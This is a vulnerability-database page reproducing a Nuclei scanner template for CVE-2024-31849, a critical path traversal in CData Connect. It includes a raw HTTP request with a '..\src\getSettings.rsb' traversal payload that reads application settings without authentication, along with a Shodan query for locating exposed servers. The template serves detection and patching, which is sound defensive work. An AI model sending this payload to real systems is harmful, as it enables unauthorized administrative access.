Lucene search
K

CData Connect < 23.4.8846 - Path Traversal

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 121 Views

CData API Server < 23.4.8844 - Path Traversal vulnerability allows unauthenticated remote attacker gain administrative acces

Related
Refs
Code
id: CVE-2024-31849

info:
  name: CData Connect < 23.4.8846 - Path Traversal
  author: DhiyaneshDK
  severity: critical
  description: |
    A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
  impact: |
    Unauthenticated attackers can exploit path traversal to gain complete administrative access to CData Connect.
  remediation: |
    Update CData Connect to version 23.4.8846 or later.
  reference:
    - https://www.tenable.com/security/research/tra-2024-09
    - https://www.cdata.com/kb/entries/jetty-cve-0324.rst
    - https://nvd.nist.gov/vuln/detail/CVE-2024-31849
    - https://github.com/Ostorlab/KEV
    - https://github.com/Stuub/CVE-2024-31848-PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-31849
    cwe-id: CWE-22
    epss-score: 0.06076
    epss-percentile: 0.92533
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:\"CData Connect\""
  tags: cve,cve2024,cdata,lfi,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.rst'

    matchers:
      - type: word
        internal: true
        words:
          - 'CData - Connect'

  - raw:
      - |
        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"items":[{'
          - ':"true"'
          - 'notifyemail'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220520b03a69e196a6b816ce0a09a305943d9619d5ae4547d4ecf1f2461c65f75ba022038882a726277d744ce8a65a58a37f8d93a4c5ca9837ae5dadb36d2db9051e512:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.08151
SSVC
121